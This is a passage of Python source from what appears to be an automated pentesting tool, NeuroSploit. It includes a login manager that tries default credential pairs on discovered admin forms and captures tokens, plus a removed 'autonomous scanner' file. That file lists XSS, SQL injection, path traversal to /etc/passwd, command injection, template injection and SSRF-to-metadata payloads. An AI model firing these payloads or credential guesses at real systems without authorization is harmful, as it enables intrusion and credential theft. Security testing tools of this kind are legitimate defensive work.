- Auto session refresh on expiry detection
- Token extraction from responses (JWT, Bearer, API keys)
"""
# Default credentials to try on admin panels
DEFAULT_CREDENTIALS = [
Credentials("admin", "admin", "admin", "default"),
Credentials("admin", "password", "admin", "default"),
Credentials("admin", "admin123", "admin", "default"),
Credentials("root", "root", "admin", "default"),
Credentials("test", "test", "user", "default"),
Credentials("user", "user", "user", "default"),
Credentials("admin", "Password1", "admin", "default"),
Credentials("administrator", "administrator", "admin", "default"),
]
# Session expiry indicators
EXPIRY_INDICATORS = [
"session expired", "session timeout", "please log in",
"please login", "sign in again", "token expired",
"unauthorized", "authentication required", "not authenticated",
"jwt expired", "invalid token", "access token expired",
]
# Login success indicators
SUCCESS_INDICATORS = [
"welcome", "dashboard", "my account", "profile",
"logged in", "sign out", "logout", "log out",
"home", "settings", "preferences",
]
# Login failure indicators
FAILURE_INDICATORS = [
"invalid", "incorrect", "wrong", "failed", "error",
"denied", "bad credentials", "authentication failed",
"login failed", "invalid username", "invalid password",
]
def __init__(self, request_engine=None, recon=None):
self.request_engine = request_engine
self.recon = recon
# Credential store
self._credentials: Dict[str, List[Credentials]] = {
"user": [],
"admin": [],
}
# Session contexts
self.contexts: Dict[str, SessionContext] = {
"user_a": SessionContext(name="user_a", role="user"),
"user_b": SessionContext(name="user_b", role="user"),
"admin": SessionContext(name="admin", role="admin"),
}
# Discovered login forms
self._login_forms: List[LoginForm] = []
self._login_attempts = 0
self._successful_logins = 0
# --- Credential Management -------------------------------------------
def add_credentials(self, username: str, password: str, role: str = "user", source: str = "provided"):
"""Add credentials for testing."""
cred = Credentials(username, password, role, source)
self._credentials.setdefault(role, []).append(cred)
logger.debug(f"Added {role} credentials: {username} (source: {source})")
def add_discovered_credentials(self, creds_list: List[Dict]):
"""Add credentials discovered during testing (from info disclosure, etc.)."""
for cred_info in creds_list:
username = cred_info.get("username", "")
password = cred_info.get("password", "")
if username and password:
self.add_credentials(username, password, role="user", source="discovered")
def get_credentials_for_role(self, role: str) -> List[Credentials]:
"""Get all credentials for a role."""
creds = self._credentials.get(role, [])
if not creds:
# Fall back to the built-in defaults for this role, selected by their role field
return [c for c in self.DEFAULT_CREDENTIALS if c.role == role]
return creds
# --- Login Form Detection --------------------------------------------
def detect_login_forms(self, html: str, page_url: str) -> List[LoginForm]:
"""Detect login forms in HTML content."""
forms = []
# Find all <form> tags
form_pattern = re.compile(
r'<form[^>]*>(.*?)</form>',
re.DOTALL | re.IGNORECASE
)
for form_match in form_pattern.finditer(html):
form_html = form_match.group(0)
form_inner = form_match.group(1)
# Check if this looks like a login form
has_password = bool(re.search(r'type=["\']password["\']', form_inner, re.I))
if not has_password:
continue
# Extract form action
action_match = re.search(r'action=["\']([^"\']*)["\']', form_html, re.I)
action = action_match.group(1) if action_match else page_url
if not action.startswith("http"):
action = urljoin(page_url, action)
# Extract method
method_match = re.search(r'method=["\']([^"\']*)["\']', form_html, re.I)
method = (method_match.group(1) if method_match else "POST").upper()
# Find username field
username_field = self._find_username_field(form_inner)
# Find password field
password_field = self._find_field_name(form_inner, r'type=["\']password["\']')
# Find CSRF token
csrf_field, csrf_value = self._find_csrf_token(form_inner)
# Find hidden fields
extra_fields = self._find_hidden_fields(form_inner)
if csrf_field and csrf_field in extra_fields:
del extra_fields[csrf_field]
# Calculate confidence
confidence = 0.5 # Has password field
login_keywords = ["login", "signin", "sign-in", "auth", "log-in", "session"]
if any(kw in action.lower() for kw in login_keywords):
confidence += 0.3
if any(kw in form_html.lower() for kw in login_keywords):
confidence += 0.2
if username_field and password_field:
forms.append(LoginForm(
url=action,
method=method,
username_field=username_field,
password_field=password_field,
csrf_field=csrf_field,
csrf_value=csrf_value,
extra_fields=extra_fields,
confidence=min(1.0, confidence),
))
# Sort by confidence
forms.sort(key=lambda f: f.confidence, reverse=True)
self._login_forms.extend(forms)
return forms
def _find_username_field(self, html: str) -> Optional[str]:
"""Find the username/email input field name."""
# Priority: explicit username/email fields
patterns = [
r'name=["\']([^"\']*(?:user|login|email|account)[^"\']*)["\']',
r'name=["\']([^"\']*)["\'].*?type=["\'](?:text|email)["\']',
r'type=["\'](?:text|email)["\'].*?name=["\']([^"\']*)["\']',
]
for pattern in patterns:
match = re.search(pattern, html, re.I)
if match:
return match.group(1)
return None
def _find_field_name(self, html: str, type_pattern: str) -> Optional[str]:
"""Find field name for a given input type pattern."""
# Try: name="x" ... type="password"
match = re.search(
r'name=["\']([^"\']+)["\'][^>]*' + type_pattern,
html, re.I
)
if match:
return match.group(1)
# Try: type="password" ... name="x"
match = re.search(
type_pattern + r'[^>]*name=["\']([^"\']+)["\']',
html, re.I
)
if match:
return match.group(1)
return None
def _find_csrf_token(self, html: str):
"""Find CSRF token in form."""
csrf_patterns = [
r'name=["\']([^"\']*(?:csrf|_token|csrfmiddlewaretoken|__RequestVerificationToken|authenticity_token|_csrf_token)[^"\']*)["\'][^>]*value=["\']([^"\']*)["\']',
r'value=["\']([^"\']*)["\'][^>]*name=["\']([^"\']*(?:csrf|_token|csrfmiddlewaretoken)[^"\']*)["\']',
]
for pattern in csrf_patterns:
match = re.search(pattern, html, re.I)
if match:
groups = match.groups()
if "csrf" in groups[0].lower() or "_token" in groups[0].lower():
return groups[0], groups[1]
return groups[1], groups[0]
return None, None
def _find_hidden_fields(self, html: str) -> Dict[str, str]:
"""Extract all hidden field name-value pairs."""
fields = {}
pattern = re.compile(
r'type=["\']hidden["\'][^>]*name=["\']([^"\']+)["\'][^>]*value=["\']([^"\']*)["\']',
re.I
)
for match in pattern.finditer(html):
fields[match.group(1)] = match.group(2)
# Also try reverse order (name before type)
pattern2 = re.compile(
r'name=["\']([^"\']+)["\'][^>]*type=["\']hidden["\'][^>]*value=["\']([^"\']*)["\']',
re.I
)
for match in pattern2.finditer(html):
fields[match.group(1)] = match.group(2)
return fields
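# The regular expressions above only match when attributes appear in one of two
# fixed orders and are quoted, so an input written as value/type/name or with
# unquoted attributes is missed. A minimal sketch of the same extraction using
# the standard library's html.parser; the names InputCollector and
# hidden_fields are hypothetical and not part of AuthManager.

```python
from html.parser import HTMLParser
from typing import Dict, List


class InputCollector(HTMLParser):
    """Collect the attributes of every <input> tag fed to the parser."""

    def __init__(self) -> None:
        super().__init__()
        self.inputs: List[Dict[str, str]] = []

    def handle_starttag(self, tag, attrs):
        # HTMLParser lowercases tag and attribute names; valueless
        # attributes arrive with a value of None.
        if tag == "input":
            self.inputs.append({name: (value or "") for name, value in attrs})


def hidden_fields(form_html: str) -> Dict[str, str]:
    """Return name -> value for hidden inputs, regardless of attribute order."""
    collector = InputCollector()
    collector.feed(form_html)
    return {
        item["name"]: item.get("value", "")
        for item in collector.inputs
        if item.get("type", "").lower() == "hidden" and item.get("name")
    }


sample = (
    '<form action="/login" method="post">'
    '<input value="abc123" type="hidden" name="csrf_token">'
    "<input type=hidden name=step value=2>"
    '<input type="text" name="user">'
    "</form>"
)
fields = hidden_fields(sample)
```

# Here both hidden inputs are found even though the first puts value before
# type and the second uses unquoted attributes.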
# --- Authentication --------------------------------------------------
async def authenticate(self, context_name: str = "user_a") -> bool:
"""Attempt to authenticate a session context.
Tries login forms with available credentials.
Returns True if authentication succeeded.
"""
if not self.request_engine:
return False
ctx = self.contexts.get(context_name)
if not ctx:
return False
ctx.state = "authenticating"
creds = self.get_credentials_for_role(ctx.role)
if not creds:
logger.debug(f"No credentials available for {context_name} ({ctx.role})")
ctx.state = "unauthenticated"
return False
# Find login forms if not already discovered
if not self._login_forms:
await self._discover_login_forms()
if not self._login_forms:
logger.debug("No login forms found")
ctx.state = "unauthenticated"
return False
# Try each form with each credential
for form in self._login_forms:
for cred in creds:
self._login_attempts += 1
success = await self._attempt_login(form, cred, ctx)
if success:
ctx.state = "authenticated"
ctx.credential = cred
ctx.login_time = time.time()
ctx.login_url = form.url
self._successful_logins += 1
logger.info(f"Login success: {context_name} as {cred.username} ({cred.role})")
return True
ctx.state = "unauthenticated"
return False
async def _discover_login_forms(self):
"""Discover login forms by crawling common login paths."""
if not self.request_engine:
return
# Use recon data if available
target = ""
if self.recon and hasattr(self.recon, "target"):
target = self.recon.target
if not target:
return
login_paths = [
"/login", "/signin", "/sign-in", "/auth/login",
"/user/login", "/admin/login", "/api/auth/login",
"/account/login", "/wp-login.php", "/admin",
]
parsed = urlparse(target)
base = f"{parsed.scheme}://{parsed.netloc}"
for path in login_paths:
try:
url = f"{base}{path}"
result = await self.request_engine.request(url, method="GET")
if result and result.status == 200 and result.body:
forms = self.detect_login_forms(result.body, url)
if forms:
logger.debug(f"Found {len(forms)} login form(s) at {url}")
return # Found forms, stop searching
except Exception:
continue
async def _attempt_login(self, form: LoginForm, cred: Credentials, ctx: SessionContext) -> bool:
"""Attempt login with a specific form and credential."""
try:
# Build form data
data = {}
# Add hidden fields first
data.update(form.extra_fields)
# Refresh CSRF token if needed
if form.csrf_field:
fresh_csrf = await self._refresh_csrf(form)
if fresh_csrf:
data[form.csrf_field] = fresh_csrf
elif form.csrf_value:
data[form.csrf_field] = form.csrf_value
# Add credentials
data[form.username_field] = cred.username
data[form.password_field] = cred.password
# Submit form
result = await self.request_engine.request(
form.url,
method=form.method,
data=data,
allow_redirects=True,
)
if not result:
return False
# Check for login success
success = self._detect_login_success(
result.body, result.status, result.headers
)
if success:
# Extract tokens and cookies
self._extract_session_data(result, ctx)
return True
return False
except Exception as e:
logger.debug(f"Login attempt failed: {e}")
return False
async def _refresh_csrf(self, form: LoginForm) -> Optional[str]:
"""Fetch fresh CSRF token from the login page."""
try:
# GET the form page to get a fresh token
parsed = urlparse(form.url)
page_url = f"{parsed.scheme}://{parsed.netloc}{parsed.path}"
result = await self.request_engine.request(page_url, method="GET")
if result and result.body:
_, csrf_value = self._find_csrf_token(result.body)
return csrf_value
except Exception:
pass
return None
def _detect_login_success(self, body: str, status: int, headers: Dict) -> bool:
"""Detect if login was successful."""
body_lower = (body or "").lower()
# Check for redirect to authenticated area
if status in (301, 302, 303, 307, 308):
location = headers.get("Location", headers.get("location", ""))
if any(kw in location.lower() for kw in ["dashboard", "home", "profile", "admin"]):
return True
# Check for Set-Cookie (session creation)
has_session_cookie = any(
"set-cookie" in k.lower() for k in headers
)
# Check for success indicators in body
success_count = sum(1 for kw in self.SUCCESS_INDICATORS if kw in body_lower)
failure_count = sum(1 for kw in self.FAILURE_INDICATORS if kw in body_lower)
# Success if: session cookie + success indicators and no failure indicators
if has_session_cookie and success_count > 0 and failure_count == 0:
return True
# Success if: 200 OK + strong success indicators + no failure
if status == 200 and success_count >= 2 and failure_count == 0:
return True
return False
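The heuristic in `_detect_login_success` can be exercised on its own. The sketch below is a standalone restatement, not the module's code: `looks_like_login_success` and the three keyword tuples are hypothetical stand-ins, because the real `SUCCESS_INDICATORS` and `FAILURE_INDICATORS` lists are defined outside this section. It also matches the `Set-Cookie` header name exactly rather than by substring.

```python
from typing import Mapping

# Hypothetical indicator lists; the real ones are class attributes not shown here.
SUCCESS_INDICATORS = ("welcome", "logout", "dashboard")
FAILURE_INDICATORS = ("invalid", "incorrect", "failed")
REDIRECT_KEYWORDS = ("dashboard", "home", "profile", "admin")


def looks_like_login_success(body: str, status: int, headers: Mapping[str, str]) -> bool:
    """Return True when a login response looks like an authenticated session."""
    body_lower = (body or "").lower()
    # Normalise header names once so lookups are case-insensitive.
    lowered = {name.lower(): value for name, value in headers.items()}

    # Rule 1: redirect into an area that usually requires authentication.
    if status in (301, 302, 303, 307, 308):
        location = lowered.get("location", "").lower()
        if any(keyword in location for keyword in REDIRECT_KEYWORDS):
            return True

    has_session_cookie = "set-cookie" in lowered
    successes = sum(1 for kw in SUCCESS_INDICATORS if kw in body_lower)
    failures = sum(1 for kw in FAILURE_INDICATORS if kw in body_lower)

    # Rule 2: a new cookie plus at least one success keyword and no failure keyword.
    if has_session_cookie and successes > 0 and failures == 0:
        return True
    # Rule 3: no cookie, so require two success keywords on a 200 response.
    return status == 200 and successes >= 2 and failures == 0
```

Keeping the rules in a pure function like this makes it cheap to check them against saved responses before trusting them in a scan.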
def _extract_session_data(self, result, ctx: SessionContext):
"""Extract tokens and cookies from a successful login response."""
# Extract cookies from Set-Cookie headers
for key, value in result.headers.items():
if key.lower() == "set-cookie":
cookie_parts = value.split(";")[0].split("=", 1)
if len(cookie_parts) == 2:
ctx.cookies[cookie_parts[0].strip()] = cookie_parts[1].strip()
# Extract tokens from response body (JSON)
body = result.body or ""
token_patterns = [
(r'"(?:access_token|token|jwt|bearer|id_token)"\s*:\s*"([^"]+)"', "bearer"),
(r'"(?:api_key|apikey|api-key)"\s*:\s*"([^"]+)"', "api_key"),
(r'"(?:refresh_token)"\s*:\s*"([^"]+)"', "refresh"),
]
for pattern, token_type in token_patterns:
match = re.search(pattern, body, re.I)
if match:
ctx.tokens[token_type] = match.group(1)
# Build auth headers
if "bearer" in ctx.tokens:
ctx.headers["Authorization"] = f"Bearer {ctx.tokens['bearer']}"
elif "api_key" in ctx.tokens:
ctx.headers["X-API-Key"] = ctx.tokens["api_key"]
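The token extraction in `_extract_session_data` can be sketched as two small pure functions. The regular expressions are copied from the method above; the function names `extract_tokens` and `build_auth_headers` are hypothetical and exist only for this illustration.

```python
import re
from typing import Dict

# Same patterns as in _extract_session_data: (regex, token type).
TOKEN_PATTERNS = [
    (r'"(?:access_token|token|jwt|bearer|id_token)"\s*:\s*"([^"]+)"', "bearer"),
    (r'"(?:api_key|apikey|api-key)"\s*:\s*"([^"]+)"', "api_key"),
    (r'"(?:refresh_token)"\s*:\s*"([^"]+)"', "refresh"),
]


def extract_tokens(body: str) -> Dict[str, str]:
    """Pull the first token of each type out of a JSON-like response body."""
    tokens: Dict[str, str] = {}
    for pattern, token_type in TOKEN_PATTERNS:
        match = re.search(pattern, body or "", re.I)
        if match:
            tokens[token_type] = match.group(1)
    return tokens


def build_auth_headers(tokens: Dict[str, str]) -> Dict[str, str]:
    """Prefer a bearer token; fall back to an API key header."""
    if "bearer" in tokens:
        return {"Authorization": f"Bearer {tokens['bearer']}"}
    if "api_key" in tokens:
        return {"X-API-Key": tokens["api_key"]}
    return {}
```

Because the patterns require a quote directly before the key name, `"refresh_token"` is not mistaken for `"token"`.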
# --- Session Management ----------------------------------------------
def detect_session_expiry(self, body: str, status: int) -> bool:
"""Check if a response indicates session expiry."""
if status in (401, 403):
return True
body_lower = (body or "").lower()
return any(kw in body_lower for kw in self.EXPIRY_INDICATORS)
async def refresh(self, context_name: Optional[str] = None) -> bool:
"""Refresh an expired session by re-authenticating.
If context_name is None, refresh all expired sessions.
"""
contexts_to_refresh = []
if context_name:
ctx = self.contexts.get(context_name)
if ctx and ctx.state == "expired":
contexts_to_refresh.append(context_name)
else:
for name, ctx in self.contexts.items():
if ctx.state == "expired":
contexts_to_refresh.append(name)
results = []
for name in contexts_to_refresh:
ctx = self.contexts[name]
ctx.state = "unauthenticated"
ctx.cookies.clear()
ctx.tokens.clear()
ctx.headers.clear()
success = await self.authenticate(name)
results.append(success)
return all(results) if results else False
def check_and_mark_expiry(self, context_name: str, body: str, status: int) -> bool:
"""Check response for expiry and mark context if expired.
Returns True if session was detected as expired.
"""
ctx = self.contexts.get(context_name)
if not ctx or ctx.state != "authenticated":
return False
if self.detect_session_expiry(body, status):
ctx.state = "expired"
logger.info(f"Session expired for {context_name}")
return True
# Check time-based expiry
if ctx.login_time and (time.time() - ctx.login_time) > ctx.session_duration:
ctx.state = "expired"
logger.info(f"Session timeout for {context_name}")
return True
return False
# --- Request Integration ---------------------------------------------
def get_context(self, context_name: str) -> Optional[SessionContext]:
"""Get a session context by name."""
return self.contexts.get(context_name)
def get_request_kwargs(self, context_name: str) -> Dict:
"""Get headers and cookies for requests as a context.
Returns dict with 'headers' and 'cookies' ready for request_engine.
"""
ctx = self.contexts.get(context_name)
if not ctx or ctx.state != "authenticated":
return {"headers": {}, "cookies": {}}
return {
"headers": dict(ctx.headers),
"cookies": dict(ctx.cookies),
}
def is_authenticated(self, context_name: str) -> bool:
"""Check if a context is currently authenticated."""
ctx = self.contexts.get(context_name)
return ctx is not None and ctx.state == "authenticated"
def get_auth_summary(self) -> Dict:
"""Get summary of authentication state for reporting."""
return {
"contexts": {
name: {
"state": ctx.state,
"role": ctx.role,
"credential": ctx.credential.username if ctx.credential else None,
"has_tokens": bool(ctx.tokens),
"has_cookies": bool(ctx.cookies),
}
for name, ctx in self.contexts.items()
},
"login_forms_found": len(self._login_forms),
"login_attempts": self._login_attempts,
"successful_logins": self._successful_logins,
"credentials_available": {
role: len(creds)
for role, creds in self._credentials.items()
},
}
@@ -1,951 +0,0 @@
"""
NeuroSploit v3 - Autonomous Scanner
This module performs autonomous endpoint discovery and vulnerability testing
when reconnaissance finds little or nothing. It actively:
1. Bruteforces directories using ffuf/gobuster/feroxbuster
2. Crawls the site aggressively
3. Tests common vulnerable endpoints
4. Generates test cases based on common patterns
5. Adapts based on what it discovers
GLOBAL AUTHORIZATION:
This tool is designed for authorized penetration testing only.
All tests are performed with explicit authorization from the target owner.
"""
import asyncio
import aiohttp
import subprocess
import json
import re
import os
from typing import Dict, List, Any, Optional, Callable
from urllib.parse import urljoin, urlparse, parse_qs, urlencode
from dataclasses import dataclass, field
from datetime import datetime
@dataclass
class DiscoveredEndpoint:
"""Represents a discovered endpoint"""
url: str
method: str = "GET"
status_code: int = 0
content_type: str = ""
content_length: int = 0
parameters: List[str] = field(default_factory=list)
source: str = "discovery" # How it was discovered
interesting: bool = False # Potentially vulnerable
@dataclass
class TestResult:
"""Result of a vulnerability test"""
endpoint: str
vuln_type: str
payload: str
is_vulnerable: bool
confidence: float
evidence: str
request: Dict
response: Dict
class AutonomousScanner:
"""
Autonomous vulnerability scanner that actively discovers and tests endpoints.
Works independently of reconnaissance - if recon fails, this scanner will:
1. Crawl the target site
2. Discover directories via bruteforce
3. Find parameters and endpoints
4. Test all discovered points for vulnerabilities
"""
# Common vulnerable endpoints to always test
COMMON_ENDPOINTS = [
# Login/Auth
"/login", "/signin", "/auth", "/admin", "/admin/login", "/wp-admin",
"/user/login", "/account/login", "/administrator",
# API endpoints
"/api", "/api/v1", "/api/v2", "/api/users", "/api/user",
"/api/login", "/api/auth", "/api/token", "/graphql",
# File operations
"/upload", "/download", "/file", "/files", "/documents",
"/images", "/media", "/assets", "/static",
# Common vulnerable paths
"/search", "/query", "/find", "/lookup",
"/include", "/page", "/view", "/show", "/display",
"/read", "/load", "/fetch", "/get",
# Debug/Dev
"/debug", "/test", "/dev", "/staging",
"/phpinfo.php", "/.env", "/.git/config",
"/server-status", "/server-info",
# CMS specific
"/wp-content", "/wp-includes", "/xmlrpc.php",
"/joomla", "/drupal", "/magento",
# Config files
"/config.php", "/configuration.php", "/settings.php",
"/web.config", "/config.xml", "/config.json",
# Backup files
"/backup", "/backup.sql", "/dump.sql",
"/db.sql", "/database.sql",
]
# Common parameters to test
COMMON_PARAMS = [
"id", "page", "file", "path", "url", "redirect", "next",
"query", "search", "q", "s", "keyword", "term",
"user", "username", "name", "email", "login",
"cat", "category", "item", "product", "article",
"action", "cmd", "command", "exec", "run",
"template", "tpl", "theme", "lang", "language",
"sort", "order", "orderby", "filter",
"callback", "jsonp", "format", "type",
"debug", "test", "demo", "preview",
]
# XSS test payloads
XSS_PAYLOADS = [
"<script>alert('XSS')</script>",
"<img src=x onerror=alert('XSS')>",
"'\"><script>alert('XSS')</script>",
"<svg onload=alert('XSS')>",
"javascript:alert('XSS')",
"<body onload=alert('XSS')>",
"'-alert('XSS')-'",
"\"><img src=x onerror=alert('XSS')>",
]
# SQLi test payloads
SQLI_PAYLOADS = [
"'", "\"", "' OR '1'='1", "\" OR \"1\"=\"1",
"' OR 1=1--", "\" OR 1=1--", "1' AND '1'='1",
"'; DROP TABLE users--", "1; SELECT * FROM users",
"' UNION SELECT NULL--", "' UNION SELECT 1,2,3--",
"1' AND SLEEP(5)--", "1'; WAITFOR DELAY '0:0:5'--",
"admin'--", "admin' #", "admin'/*",
]
# LFI test payloads
LFI_PAYLOADS = [
"../../../etc/passwd",
"....//....//....//etc/passwd",
"/etc/passwd",
"..\\..\\..\\windows\\win.ini",
"file:///etc/passwd",
"/proc/self/environ",
"php://filter/convert.base64-encode/resource=index.php",
"php://input",
"expect://id",
"data://text/plain;base64,PD9waHAgcGhwaW5mbygpOyA/Pg==",
]
# Command injection payloads
CMDI_PAYLOADS = [
"; id", "| id", "|| id", "&& id",
"; whoami", "| whoami", "|| whoami",
"`id`", "$(id)", "${id}",
"; cat /etc/passwd", "| cat /etc/passwd",
"; ping -c 3 127.0.0.1", "| ping -c 3 127.0.0.1",
]
# SSTI payloads
SSTI_PAYLOADS = [
"{{7*7}}", "${7*7}", "<%= 7*7 %>",
"{{config}}", "{{self}}", "{{request}}",
"${T(java.lang.Runtime).getRuntime().exec('id')}",
"{{''.__class__.__mro__[2].__subclasses__()}}",
"@(1+2)", "#{7*7}",
]
# SSRF payloads
SSRF_PAYLOADS = [
"http://localhost", "http://127.0.0.1",
"http://[::1]", "http://0.0.0.0",
"http://169.254.169.254/latest/meta-data/",
"http://metadata.google.internal/",
"file:///etc/passwd",
"dict://localhost:11211/",
"gopher://localhost:6379/_",
]
def __init__(
self,
scan_id: str,
log_callback: Optional[Callable] = None,
timeout: int = 15,
max_depth: int = 3
):
self.scan_id = scan_id
self.log_callback = log_callback or self._default_log
self.timeout = timeout
self.max_depth = max_depth
self.discovered_endpoints: List[DiscoveredEndpoint] = []
self.tested_urls: set = set()
self.vulnerabilities: List[TestResult] = []
self.session: Optional[aiohttp.ClientSession] = None
self.wordlist_path = "/opt/wordlists/common.txt"
async def _default_log(self, level: str, message: str):
"""Default logging"""
print(f"[{level.upper()}] {message}")
async def log(self, level: str, message: str):
"""Log a message"""
if asyncio.iscoroutinefunction(self.log_callback):
await self.log_callback(level, message)
else:
self.log_callback(level, message)
async def __aenter__(self):
connector = aiohttp.TCPConnector(ssl=False, limit=50)
timeout = aiohttp.ClientTimeout(total=self.timeout)
self.session = aiohttp.ClientSession(connector=connector, timeout=timeout)
return self
async def __aexit__(self, *args):
if self.session:
await self.session.close()
async def run_autonomous_scan(
self,
target_url: str,
recon_data: Optional[Dict] = None
) -> Dict[str, Any]:
"""
Run a fully autonomous scan on the target.
This will:
1. Spider/crawl the target
2. Discover directories
3. Find parameters
4. Test all discovered endpoints
Returns comprehensive results even if recon found nothing.
"""
await self.log("info", f"Starting autonomous scan on: {target_url}")
await self.log("info", "This is an authorized penetration test.")
parsed = urlparse(target_url)
base_url = f"{parsed.scheme}://{parsed.netloc}"
results = {
"target": target_url,
"started_at": datetime.utcnow().isoformat(),
"endpoints": [],
"vulnerabilities": [],
"parameters_found": [],
"directories_found": [],
"technologies": []
}
# Phase 1: Initial probe
await self.log("info", "Phase 1: Initial target probe...")
initial_info = await self._probe_target(target_url)
results["technologies"] = initial_info.get("technologies", [])
await self.log("info", f" Technologies detected: {', '.join(results['technologies']) or 'None'}")
# Phase 2: Directory discovery
await self.log("info", "Phase 2: Directory discovery...")
directories = await self._discover_directories(base_url)
results["directories_found"] = directories
await self.log("info", f" Found {len(directories)} directories")
# Phase 3: Crawl the site
await self.log("info", "Phase 3: Crawling site for links and forms...")
crawled = await self._crawl_site(target_url)
await self.log("info", f" Crawled {len(crawled)} pages")
# Phase 4: Discover parameters
await self.log("info", "Phase 4: Parameter discovery...")
parameters = await self._discover_parameters(target_url)
results["parameters_found"] = parameters
await self.log("info", f" Found {len(parameters)} parameters")
# Phase 5: Generate test endpoints
await self.log("info", "Phase 5: Generating test endpoints...")
test_endpoints = self._generate_test_endpoints(target_url, parameters, directories)
await self.log("info", f" Generated {len(test_endpoints)} test endpoints")
# Merge with any recon data
if recon_data:
for url in recon_data.get("urls", []):
self._add_endpoint(url, source="recon")
for endpoint in recon_data.get("endpoints", []):
if isinstance(endpoint, dict):
self._add_endpoint(endpoint.get("url", ""), source="recon")
# Add test endpoints
for ep in test_endpoints:
self._add_endpoint(ep["url"], source=ep.get("source", "generated"))
results["endpoints"] = [
{
"url": ep.url,
"method": ep.method,
"status": ep.status_code,
"source": ep.source,
"parameters": ep.parameters
}
for ep in self.discovered_endpoints
]
# Phase 6: Vulnerability testing
await self.log("info", f"Phase 6: Testing {len(self.discovered_endpoints)} endpoints for vulnerabilities...")
for i, endpoint in enumerate(self.discovered_endpoints):
if endpoint.url in self.tested_urls:
continue
self.tested_urls.add(endpoint.url)
await self.log("debug", f" [{i+1}/{len(self.discovered_endpoints)}] Testing: {endpoint.url[:80]}...")
# Test each vulnerability type
vulns = await self._test_endpoint_all_vulns(endpoint)
self.vulnerabilities.extend(vulns)
# Log findings immediately
for vuln in vulns:
await self.log("warning", f" FOUND: {vuln.vuln_type} on {endpoint.url[:60]} (confidence: {vuln.confidence:.0%})")
results["vulnerabilities"] = [
{
"type": v.vuln_type,
"endpoint": v.endpoint,
"payload": v.payload,
"confidence": v.confidence,
"evidence": v.evidence[:500]
}
for v in self.vulnerabilities
]
results["completed_at"] = datetime.utcnow().isoformat()
results["summary"] = {
"endpoints_tested": len(self.tested_urls),
"vulnerabilities_found": len(self.vulnerabilities),
"critical": len([v for v in self.vulnerabilities if v.confidence >= 0.9]),
"high": len([v for v in self.vulnerabilities if 0.7 <= v.confidence < 0.9]),
"medium": len([v for v in self.vulnerabilities if 0.5 <= v.confidence < 0.7]),
}
await self.log("info", f"Autonomous scan complete. Found {len(self.vulnerabilities)} potential vulnerabilities.")
return results
def _add_endpoint(self, url: str, source: str = "discovery"):
"""Add an endpoint if not already discovered"""
if not url:
return
for ep in self.discovered_endpoints:
if ep.url == url:
return
self.discovered_endpoints.append(DiscoveredEndpoint(url=url, source=source))
async def _probe_target(self, url: str) -> Dict:
"""Initial probe to gather info about the target"""
info = {"technologies": [], "headers": {}, "server": ""}
try:
async with self.session.get(url, headers={"User-Agent": "NeuroSploit/3.0"}) as resp:
info["headers"] = dict(resp.headers)
info["status"] = resp.status
body = await resp.text()
# Detect technologies
if "wp-content" in body or "WordPress" in body:
info["technologies"].append("WordPress")
if "Joomla" in body:
info["technologies"].append("Joomla")
if "Drupal" in body:
info["technologies"].append("Drupal")
if "react" in body.lower():
info["technologies"].append("React")
if "angular" in body.lower():
info["technologies"].append("Angular")
if "vue" in body.lower():
info["technologies"].append("Vue.js")
if "php" in body.lower() or ".php" in body:
info["technologies"].append("PHP")
if "asp.net" in body.lower() or "aspx" in body.lower():
info["technologies"].append("ASP.NET")
if "java" in body.lower() or "jsp" in body.lower():
info["technologies"].append("Java")
# Server header
info["server"] = resp.headers.get("Server", "")
if info["server"]:
info["technologies"].append(f"Server: {info['server']}")
# X-Powered-By
powered_by = resp.headers.get("X-Powered-By", "")
if powered_by:
info["technologies"].append(f"Powered by: {powered_by}")
except Exception as e:
await self.log("debug", f"Probe error: {str(e)}")
return info
async def _discover_directories(self, base_url: str) -> List[str]:
"""Discover directories using built-in wordlist and common paths"""
found_dirs = []
# First try common endpoints
await self.log("debug", " Testing common endpoints...")
tasks = []
for endpoint in self.COMMON_ENDPOINTS:
url = urljoin(base_url, endpoint)
tasks.append(self._check_url_exists(url))
results = await asyncio.gather(*tasks, return_exceptions=True)
for endpoint, result in zip(self.COMMON_ENDPOINTS, results):
if isinstance(result, dict) and result.get("exists"):
found_dirs.append(endpoint)
self._add_endpoint(urljoin(base_url, endpoint), source="directory_bruteforce")
await self.log("debug", f" Found: {endpoint} [{result.get('status')}]")
# Try using ffuf if available
if await self._tool_available("ffuf"):
await self.log("debug", " Running ffuf directory scan...")
ffuf_results = await self._run_ffuf(base_url)
for path in ffuf_results:
if path not in found_dirs:
found_dirs.append(path)
self._add_endpoint(urljoin(base_url, path), source="ffuf")
return found_dirs
async def _check_url_exists(self, url: str) -> Dict:
"""Check if a URL exists (returns 2xx or 3xx)"""
try:
async with self.session.get(
url,
headers={"User-Agent": "NeuroSploit/3.0"},
allow_redirects=False
) as resp:
exists = resp.status < 400
return {"exists": exists, "status": resp.status}
except Exception:
return {"exists": False, "status": 0}
async def _tool_available(self, tool_name: str) -> bool:
"""Check if a tool is available"""
try:
result = subprocess.run(
["which", tool_name],
capture_output=True,
timeout=5
)
return result.returncode == 0
except Exception:
return False
async def _run_ffuf(self, base_url: str) -> List[str]:
"""Run ffuf for directory discovery"""
found = []
try:
wordlist = self.wordlist_path if os.path.exists(self.wordlist_path) else None
if not wordlist:
return found
cmd = [
"ffuf",
"-u", f"{base_url}/FUZZ",
"-w", wordlist,
"-mc", "200,201,301,302,307,401,403,500",
"-t", "20",
"-timeout", "10",
"-o", "/tmp/ffuf_out.json",
"-of", "json",
"-s" # Silent
]
process = await asyncio.create_subprocess_exec(
*cmd,
stdout=asyncio.subprocess.PIPE,
stderr=asyncio.subprocess.PIPE
)
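# communicate() drains the stdout/stderr pipes, so a chatty child cannot block on a full pipe
await asyncio.wait_for(process.communicate(), timeout=120)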
if os.path.exists("/tmp/ffuf_out.json"):
with open("/tmp/ffuf_out.json", "r") as f:
data = json.load(f)
for result in data.get("results", []):
path = "/" + result.get("input", {}).get("FUZZ", "")
if path and path != "/":
found.append(path)
os.remove("/tmp/ffuf_out.json")
except Exception as e:
await self.log("debug", f"ffuf error: {str(e)}")
return found
async def _crawl_site(self, url: str) -> List[str]:
"""Crawl the site to find links, forms, and endpoints"""
crawled = []
to_crawl = [url]
visited = set()
depth = 0
parsed_base = urlparse(url)
base_domain = parsed_base.netloc
while to_crawl and depth < self.max_depth:
current_batch = to_crawl[:20] # Crawl 20 at a time
to_crawl = to_crawl[20:]
tasks = []
for page_url in current_batch:
if page_url in visited:
continue
visited.add(page_url)
tasks.append(self._extract_links(page_url, base_domain))
results = await asyncio.gather(*tasks, return_exceptions=True)
for result in results:
if isinstance(result, list):
crawled.extend(result)
for link in result:
